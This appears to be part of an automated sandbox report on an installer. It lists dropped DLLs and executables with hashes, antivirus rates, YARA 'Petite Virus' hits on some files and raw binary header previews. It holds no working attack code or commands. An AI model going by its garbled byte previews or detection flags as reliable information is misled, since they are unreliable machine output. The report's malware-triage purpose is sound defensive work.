                                                                                  SSDEEP:1536:q0Z4sz1ZMjCjDIhoLffiedENahBzzxO/JfgmYFGKEvi8TxCI+vHVl:v4MzMjGkhoLfsahS/JYN2vUl
                                                                                  MD5:4E35BA785CD3B37A3702E577510F39E3
                                                                                  SHA1:A2FD74A68BEFF732E5F3CB0835713AEA8D639902
                                                                                  SHA-256:0AFE688B6FCA94C69780F454BE65E12D616C6E6376E80C5B3835E3FA6DE3EB8A
                                                                                  SHA-512:1B839AF5B4049A20D9B8A0779FE943A4238C8FBFBF306BC6D3A27AF45C76F6C56B57B2EC8F087F7034D89B5B139E53A626A8D7316BE1374EAC28B06D23E7995D
                                                                                  Malicious:false
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-930UV.tmp, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                  Preview:MZ......................@...................................D.... ..PE..L.....U]...........!......................... ............................................@.........................P...........d.......@...............................................................................8...............................................................@..@.rsrc...............................@..@.......................................@petite..............................`..`...........................................&MK#H..OEJ..}??...:..$ayf.r7.w(/*.d`...A(7.%p.f.>\..d."..W......[4.0..ZY..... .....~...T....9a+..'.......g!.....l...<..?Y.(..[k.I=....D.....c.*.=.?.8...D>0...#.ZdO..Z...%......X.P..bS..s..=$...m.N........A......A4..J>Wa.N..K.>....2n8.ii.#....y#.J ....i!...a7..Pbl@B.%h0..8RSr.........]..z.\...x..e..5.3.$h. <G.3....-......Q....O0..,......Y}......@...<...t.H).T..! .....ap......Tj.o...0b...`..yX.. g...hzA...b.7.s$M.... ..'....\$...H.\.l.C g..4..(.6@.Q....B(..
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):115712
                                                                                  Entropy (8bit):6.401537154757194
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:rY4gILp0Vt7BMkvfHutO+eP0ZjflQf5xqkYXeo21sb2rqG70:rY4gILp0Vt77nLBCtQfjqv8qG70
                                                                                  MD5:840D631DA54C308B23590AD6366EBA77
                                                                                  SHA1:5ED0928667451239E62E6A0A744DA47C74E1CF89
                                                                                  SHA-256:6BAD60DF9A560FB7D6F8647B75C367FDA232BDFCA2291273A21179495DAC3DB9
                                                                                  SHA-512:1394A48240BA4EF386215942465BDE418C5C6ED73FC935FE7D207D2A1370155C94CDC15431985ED4E656CA6B777BA79FFC88E78FA3D99DB7E0E6EAC7D1663594
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?..R{...{...{...o...q...o.......o...i...)...W...)...t...)...j...o...x...{.......-...s...-...z...-.4.z...-...z...Rich{...........PE..L....H.a...........!.....$...........h.......@............................... ............@.............................x.......(.......................................8..............................@............@..D............................text....#.......$.................. ..`.rdata...x...@...z...(..............@..@.data.... ..........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):337408
                                                                                  Entropy (8bit):6.515131904432587
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:3nzsyDn7PDS+FDflUjvJUkbEOyF1rOpsuCOuOff5k4F/lTRHA:3377SKfgvqkbFyFJCRRzH
                                                                                  MD5:62D2156E3CA8387964F7AA13DD1CCD5B
                                                                                  SHA1:A5067E046ED9EA5512C94D1D17C394D6CF89CCCA
                                                                                  SHA-256:59CBFBA941D3AC0238219DAA11C93969489B40F1E8B38FABDB5805AC3DD72BFA
                                                                                  SHA-512:006F7C46021F339B6CBF9F0B80CFFA74ABB8D48E12986266D069738C4E6BDB799BFBA4B8EE4565A01E90DBE679A96A2399D795A6EAD6EACBB4818A155858BF60
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@..|...|...|...p...|...w...|.d.r...|...v...|...x...|.i.#...|...}.|.|.d.!...|...w...|..V....|...v...|.......|. .z...|.Rich..|.........PE..L....r.b.....................>......\........ ....@.......................................@.....................................x....0.......................@...3................................................... ..(............................text............................... ..`.rdata..r.... ......................@..@.data....'..........................@....sxdata...... ......................@....rsrc........0......................@..@.reloc...<...@...>..................@..B........................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:Unicode text, UTF-8 text
                                                                                  Category:dropped
                                                                                  Size (bytes):1059
                                                                                  Entropy (8bit):5.1208137218866945
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:LLDrmJHHH0yN3gtsHw1hj9QHOsUv4eOk4/+/m3oqLF5n:LLDaJHlxE35QHOs5exm3ogF5n
                                                                                  MD5:B7EDCC6CB01ACE25EBD2555CF15473DC
                                                                                  SHA1:2627FF03833F74ED51A7F43C55D30B249B6A0707
                                                                                  SHA-256:D6B4754BB67BDD08B97D5D11B2D7434997A371585A78FE77007149DF3AF8D09C
                                                                                  SHA-512:962BD5C9FB510D57FAC0C3B189B7ADEB29E00BED60F0BB9D7E899601C06C2263EDA976E64C352E4B7C0AAEFB70D2FCB0ABEF45E43882089477881A303EB88C09
                                                                                  Malicious:false
                                                                                  Preview:Copyright (c) 2011 Jan Kokem.ller..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONNECTION WITH
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):31936
                                                                                  Entropy (8bit):6.6461204214578
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:SEEn30ilOAb++HynTDbc3fwaVCPxWE/MM:SEa0YOU1HgU3fwaVCPxqM
                                                                                  MD5:72E3BDD0CE0AF6A3A3C82F3AE6426814
                                                                                  SHA1:A2FB64D5B9F5F3181D1A622D918262CE2F9A7AA3
                                                                                  SHA-256:7AC8A8D5679C96D14C15E6DBC6C72C260AAEFB002D0A4B5D28B3A5C2B15DF0AB
                                                                                  SHA-512:A876D0872BFBF099101F7F042AEAF1FD44208A354E64FC18BAB496BEEC6FDABCA432A852795CFC0A220013F619F13281B93ECC46160763AC7018AD97E8CC7971
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........P.........#.....&...L...............@.....d................................8......... .........................b............................P...,...................................R......................x................................text....%.......&..................`.P`.data........@.......*..............@.`..rdata.......P.......,..............@.0@/4...........`.......2..............@.0@.bss.........p........................`..edata..b............>..............@.0@.idata...............@..............@.0..CRT....,............H..............@.0..tls.................J..............@.0..reloc...............L..............@.0B................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):772608
                                                                                  Entropy (8bit):6.546391052615969
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:Q75mFL0MNnM/SQdtij4UujFhGiNV1SckT3wio2L2jV6EfnQ29mwF3s4iGtInw1m8:AwN0e0lN1fnQUFccGns9ukS6
                                                                                  MD5:B3B487FC3832B607A853211E8AC42CAD
                                                                                  SHA1:06E32C28103D33DAD53BE06C894203F8808D38C1
                                                                                  SHA-256:30BC10BD6E5B2DB1ACE93C2004E24C128D20C242063D4F0889FD3FB3E284A9E4
                                                                                  SHA-512:FA6BDBA4F2A0CF4CCA40A333B69FD041D9EDC0736EDA206F17F10AF5505CC4688B0401A3CAD2D2F69392E752B8877DB593C7872BCDB133DC785A200FF38598BB
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....1.d.................D..........$].......`....@.......................................@......@...................0..o............p...(...................`...............................P......................X........ .......................text...h4.......6.................. ..`.itext.......P.......:.............. ..`.data....7...`...8...H..............@....bss....0i...............................idata..............................@....didata...... ......................@....edata..o....0......................@..@.tls.........@...........................rdata..]....P......................@..@.reloc.......`......................@..B.rsrc....(...p...(..................@..@....................................@..@................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):562190
                                                                                  Entropy (8bit):6.388293171196564
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:uCtwsqIfrUmUBrusLdVAjA1ATAtuQ8T2Q8TOksqHOuCHWoEuEc4XEmEVEEAcIHAj:uqiIoYmOuNNQ1zU/xGl
                                                                                  MD5:713D04E7396D3A4EFF6BF8BA8B9CB2CD
                                                                                  SHA1:D824F373C219B33988CFA3D4A53E7C2BFA096870
                                                                                  SHA-256:00FB8E819FFDD2C246F0E6C8C3767A08E704812C6443C8D657DFB388AEB27CF9
                                                                                  SHA-512:30311238EF1EE3B97DF92084323A54764D79DED62BFEB12757F4C14F709EB2DBDF6625C260FB47DA2D600E015750394AA914FC0CC40978BA494D860710F9DC40
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Rd...............(..........................@.......................................@... .................................H...........................................................D...........................l............................text...T...........................`..`.data...X...........................@....rdata..H...........................@..@/4......P...........................@..@.bss....t................................idata..H............d..............@....CRT....0............n..............@....tls.................p..............@....rsrc................r..............@....reloc...............x..............@..B................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):214016
                                                                                  Entropy (8bit):6.676457645865373
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:v3UEEkp2yVTcc295GSSazZq0/OlxAOxN5jZ2Ti30ezAg0Fu9RBhk1Xion:cEEpYcc2G/adqLtxLZ2+vAO9Hhkzn
                                                                                  MD5:2C747F19BF1295EBBDAB9FB14BB19EE2
                                                                                  SHA1:6F3B71826C51C739D6BB75085E634B2B2EF538BC
                                                                                  SHA-256:D2074B91A63219CFD3313C850B2833CD579CC869EF751B1F5AD7EDFB77BD1EDD
                                                                                  SHA-512:C100C0A5AF52D951F3905884E9B9D0EC1A0D0AEBE70550A646BA6E5D33583247F67CA19E1D045170A286D92EE84E1676A6C1B0527E017A35B6242DD9DEE05AF4
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}6,.9WB.9WB.9WB...9.:WB.9WC.hWB....;WB."..&WB."..WB."...WB.9WB.?WB."..8WB."..8WB."..8WB.Rich9WB.........PE..L......W...........!.....N...........n.......`............................................@.........................`...h.......(....`..X....................p.......................................................`...............................text...?L.......N.................. ..`.rdata......`.......R..............@..@.data....W.......2..................@....rsrc...X....`......................@..@.reloc..f&...p...(..................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):852754
                                                                                  Entropy (8bit):6.503318968423685
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:fpFFQV+FKJ37Dm+yY4pBkPr2v2meLaoHN/oBrZ3ixdnGVzpJXm/iN:fpnzFw37iDYIBkzuPcHNgrZ3uGVzm/iN
                                                                                  MD5:07FB6D31F37FB1B4164BEF301306C288
                                                                                  SHA1:4CB41AF6D63A07324EF6B18B1A1F43CE94E25626
                                                                                  SHA-256:06DDF0A370AF00D994824605A8E1307BA138F89B2D864539F0D19E8804EDAC02
                                                                                  SHA-512:CAB4A7C5805B80851ABA5F2C9B001FABC1416F6648D891F49EACC81FE79287C5BAA01306A42298DA722750B812A4EA85388FFAE9200DCF656DD1D5B5B9323353
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L..Y.,..v......!......... .....................a................................O}........ ......................................@.......................P..X0...........................0.......................................................text...............................`.P`.data...............................@.`..rdata..............................@.`@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,.... ......................@.0..tls.... ....0......................@.0..rsrc........@......................@.0..reloc..X0...P...2..................@.0B/4...................&..............@.@B/19.................*..............@..B/31..........@......................@..B/45..........`......................@..B/57.................................@.0B/70.....i...............
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):149845
                                                                                  Entropy (8bit):7.893881970959476
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:y0z4JQHu5EvSA/JqiK2s6g+hUCQiMVQ623hi3JKz8KQP6ZwhQrNrbZ:yUju5GY7l+CCYVQ62YUzXQiqhQrJbZ
                                                                                  MD5:526E02E9EB8953655EB293D8BAC59C8F
                                                                                  SHA1:7CA6025602681EF6EFDEE21CD11165A4A70AA6FE
                                                                                  SHA-256:E2175E48A93B2A7FA25ACC6879F3676E04A0C11BB8CDFD8D305E35FD9B5BBBB4
                                                                                  SHA-512:053EB66D17E5652A12D5F7FAF03F02F35D1E18146EE38308E39838647F91517F8A9DC0B7A7748225F2F48B8F0347B0A33215D7983E85FCA55EF8679564471F0B
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-EATSP.tmp, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                  Preview:MZ......................@...................................D.... ..PE..L....r.[...........!....U....D............... ............................... ............@.........................P...........d............................N..........................................................8............................................@..................@..@.rsrc................B..............@..@.......................................@petite..U.......U....F..............`..`.....................................5....`K...=1.;;..s}....3500.z.<..]goR.lVO..C..j...........O......9#f.S.$1.b.D.8...VX....sb .A.%I......B.........R...Z5.............y......_W.0.!..T..nT.V..J..s.1`..V...Cb.2x0......0B...4...D.`...!.>[7..^;w'.u"W/...).P.m...P.......qF<.~1..T.>F.F.Rr.`...N....3$...w.L..P..SQP]C^.....2...%5.v...3.a`.k....q.0.o..A......k.....B..P.h.fy..jyb...<t$.%c-...<9.1#2.7./0.j.o#~...,!fuJ.M..a...(...0@.........,..t.3d"qva....fm.=.....]....s...z}-X..3................y>.!......g..E
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):34392
                                                                                  Entropy (8bit):7.81689943223162
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:mYBs3O9YL558R6R8P8W2rjQZQtfTIxRYsetoPNvPWIl+syr:vsUY15mqzW2u8rIxisFcJr
                                                                                  MD5:EA245B00B9D27EF2BD96548A50A9CC2C
                                                                                  SHA1:8463FDCDD5CED10C519EE0B406408AE55368E094
                                                                                  SHA-256:4824A06B819CBE49C485D68A9802D9DAE3E3C54D4C2D8B706C8A87B56CEEFBF3
                                                                                  SHA-512:EF1E107571402925AB5B1D9B096D7CEFF39C1245A23692A3976164D0DE0314F726CCA0CB10246FE58A13618FD5629A92025628373B3264153FC1D79B0415D9A7
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ph..4...4...4.......0...[...0...[...6...4.......V...0...`*..........5....)......Rich4...........................PE..L.....T...........!................6 .......................................0......................................D#..y....!..d.......X............................................................................................................................z..................`....rsrc...........X...................@..@....................................`...petite....... ......................`...................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):967168
                                                                                  Entropy (8bit):6.500850562754145
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:j2ezAN6FpYQSzclODziLQEkkDHFb1aWGssVvVmPUwV+SiRm7rhj:jhAgFptPlqmPDHJ1apVdYUy+jRmX
                                                                                  MD5:C06D6F4DABD9E8BBDECFC5D61B43A8A9
                                                                                  SHA1:16D9F4F035835AFE8F694AE5529F95E4C3C78526
                                                                                  SHA-256:665D47597146DDAAA44B771787B750D3CD82C5B5C0B33CA38F093F298326C9BB
                                                                                  SHA-512:B0EBE9E2682A603C34F2B884121FA5D2D87ED3891990CCD91CD14005B28FE208A3B86FA20E182F9E7FC5142A267C8225AEFDCB23CF5B7556D2CF8F9E3BDE62D4
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V.~..m...m...m......m.....m......m.......m..)3...m..)3...m..)3...m.......m...m..rm...m..m..3...m..3...m..3...m..Rich.m..........................PE..L...8..^...........!.........&.......`....................................................@..........................4.......G..<...............................HR..P+..T............................+..@...............D............................text............................... ..`.rdata..............................@..@.data........P...$...D..............@....trace.......`.......h..............@..@.gfids...............~..............@..@_RDATA..@...........................@..@.debug_o............................@..B.rsrc................l..............@..@.reloc..HR.......T...n..............@..B................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):197646
                                                                                  Entropy (8bit):6.1570532273946625
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:brPGp0y4SP+iBGgySYm+dE3sYrJqkAzhU88vsAGSW+:brPGaTEsHSYmbbOU8osAGG
                                                                                  MD5:2C8EC61630F8AA6AAC674E4C63F4C973
                                                                                  SHA1:64E3BB9AA505C66E87FE912D4EA3054ADF6CEF76
                                                                                  SHA-256:DFD55D0DDD1A7D081FCE8E552DC29706A84DC6CA2FDD2F82D63F33D74E882849
                                                                                  SHA-512:488378012FB5F477ED4636C37D7A883B1DAD0FBC671D238B577A9374EFE40AB781F5E483AE921F1909A9B7C1C2A3E78E29B533D3B6FFE15AAEE840CAD2DCF5D0
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...............................m................................]_........ ...................... ..A....0...............................`..............................p0.......................1..D............................text...............................`.P`.data...............................@.0..rdata..L0.......2..................@.`@/4...........P......................@.0@.bss..................................`..edata..A.... ......................@.0@.idata.......0......................@.0..CRT....,....@......................@.0..tls.........P......................@.0..reloc.......`......................@.0B................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):126478
                                                                                  Entropy (8bit):6.268811819718352
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:UnNKg6JaJUeHjiaphKMLrn8uexz3TmBUg6xcE:UNcJGGehKMLJBUg6x
                                                                                  MD5:6E93C9C8AADA15890073E74ED8D400C9
                                                                                  SHA1:94757DBD181346C7933694EA7D217B2B7977CC5F
                                                                                  SHA-256:B6E2FA50E0BE319104B05D6A754FE38991E6E1C476951CEE3C7EBDA0DC785E02
                                                                                  SHA-512:A9F71F91961C75BB32871B1EFC58AF1E1710BDE1E39E7958AE9BB2A174E84E0DD32EBAAB9F5AE37275651297D8175EFA0B3379567E0EB0272423B604B4510852
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....^...................p.....m.........................p......f......... .........................{.... ...............................P..............................X........................!...............................text....\.......^..................`.P`.data........p.......b..............@.`..rdata..h&.......(...d..............@.`@/4......\B.......D..................@.0@.bss..................................`..edata..{...........................@.0@.idata....... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):394752
                                                                                  Entropy (8bit):6.662070316214798
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:uAlmRfeS+mOxv8bgDTuXU54l8WybBE36IpuIT9nxQPQnhH/a0CRdWqWJwGKp:zlm0S+SEuXU54NylJIJ9KPQnhilRsVJ
                                                                                  MD5:A4123DE65270C91849FFEB8515A864C4
                                                                                  SHA1:93971C6BB25F3F4D54D4DF6C0C002199A2F84525
                                                                                  SHA-256:43A9928D6604BF604E43C2E1BAB30AE1654B3C26E66475F9488A95D89A4E6113
                                                                                  SHA-512:D0834F7DB31ABA8AA9D97479938DA2D4CD945F76DC2203D60D24C75D29D36E635C2B0D97425027C4DEBA558B8A41A77E288F73263FA9ABC12C54E93510E3D384
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......KL...-d..-d..-d..U...-d..Be..-d.TEe..-d..-e.:-d..Ba..-d..B`..-d..Bg..-d..B`.c-d..Bd..-d..B...-d..Bf..-d.Rich.-d.........................PE..L.....b`...........!.....L..........+S.......`...............................P............@.................................L........... .................... ..\ ..$...............................@...@............`...............................text...NK.......L.................. ..`.rdata......`.......P..............@..@.data...............................@....rsrc... ...........................@..@.reloc..\ ... ..."..................@..B................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):240654
                                                                                  Entropy (8bit):6.518503846592995
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:yZDfF4DjzIHBV+bUeenu+t+oSTdjpNZ7utS81qpHW4paP2L:ekjzMBVKXeuq+oSTdjpr7N8f+L
                                                                                  MD5:4F0C85351AEC4B00300451424DB4B5A4
                                                                                  SHA1:BB66D807EDE0D7D86438207EB850F50126924C9D
                                                                                  SHA-256:CC0B53969670C7275A855557EA16182C932160BC0F8543EFFC570F760AE2185E
                                                                                  SHA-512:80C84403ED47380FF75EBA50A23E565F7E5C68C7BE8C208A5A48B7FB0798FF51F3D33780C902A6F8AB0E6DB328860C071C77B93AC88CADF84FEF7DF34DE3E2DA
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....H...................`.....g.................................\........ .........................o.......\...............................t............................S.......................................................text...dF.......H..................`.P`.data...X....`.......L..............@.P..rdata.......p.......N..............@.`@/4.......<.......>...T..............@.0@.bss..................................`..edata..o...........................@.0@.idata..\...........................@.0..CRT....,...........................@.0..tls................................@.0..reloc..t...........................@.0B................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):7910
                                                                                  Entropy (8bit):6.931925007191986
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:piDl1jKrGer007ia6abHX0d/aeHeN+VPHIJQxNiJCl9AK0f:IDJ9aDb30dCe+4PHIJrJCl9AK0f
                                                                                  MD5:1268DEA570A7511FDC8E70C1149F6743
                                                                                  SHA1:1D646FC69145EC6A4C0C9CAD80626AD40F22E8CD
                                                                                  SHA-256:F266DBA7B23321BF963C8D8B1257A50E1467FAAAB9952EF7FFED1B6844616649
                                                                                  SHA-512:E19F0EA39FF7AA11830AF5AAD53343288C742BE22299C815C84D24251FA2643B1E0401AF04E5F9B25CAB29601EA56783522DDB06C4195C6A609804880BAE9E9B
                                                                                  Malicious:false
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-IM6II.tmp, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                  Preview:MZ......................@...................................D.... ..PE..L.....V...........!.................p.......0............................................@.........................Pr.......q..d....P.......................%.......................................................q..8....................................@..........................@..@.rsrc........P......................@..@.............`.........................@petite.......p......................`..`.........................................|7{M..... ........r B`.Zr..P.........T}.e..YJ...=.X..q.}......b.I...G.....^.d...R..-R.....d_.......K.q.H.A=.-S..,_.....L...........2.............u.u.%...:.q....c.[.....`...\.X..8..B.@L..3.7.q.....)!.- ...D.....p...J...RU..Q.A..[.#&..R.....".+4...px/7..\....4...., ..8...5.hV.>] ....3.-.<..I+.<r..T..H,Q..!..i--..+.Zq.[...H... ...N.8..#...a.x.iU.G..-_..R....Z(cT%.....S.P.U:g?...;....&....@..KI.X.Q..PQ..v..*....{..~..}..f....c..`....Q...q..%......,j.4.Y..)....Cf7..
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):227328
                                                                                  Entropy (8bit):6.641153481093122
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:jtJXnqDMJgH50aKyumLCGTrS4ifbjoO88k:KqgHlKyumLCGTrS4inoZ
                                                                                  MD5:BC824DC1D1417DE0A0E47A30A51428FD
                                                                                  SHA1:C909C48C625488508026C57D1ED75A4AE6A7F9DB
                                                                                  SHA-256:A87AA800F996902F06C735EA44F4F1E47F03274FE714A193C9E13C5D47230FAB
                                                                                  SHA-512:566B5D5DDEA920A31E0FB9E048E28EF2AC149EF075DB44542A46671380F904427AC9A6F59FBC09FE3A4FBB2994F3CAEEE65452FE55804E403CEABC091FFAF670
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...e>.a...........#.........t...V.................e.........................@......1......... .........................#....................................0...............................).......................................................text...............................`.P`.data...............................@.`..rdata..d0.......2..................@.`@.eh_framd@...@...B..................@.0@.bss.....T............................`..edata..#............T..............@.0@.idata...............^..............@.0..CRT....,............d..............@.0..tls......... .......f..............@.0..reloc.......0.......h..............@.0B................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):123406
                                                                                  Entropy (8bit):6.263889638223575
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:hnPkU1t2P2hHV5JG1YBBAUBEd8+poyez9djcx2/8s6UJqfxX+1XOAhbKzb3+d:xPu21IYyCTToE6c+6e+d
                                                                                  MD5:B49ECFA819479C3DCD97FAE2A8AB6EC6
                                                                                  SHA1:1B8D47D4125028BBB025AAFCA1759DEB3FC0C298
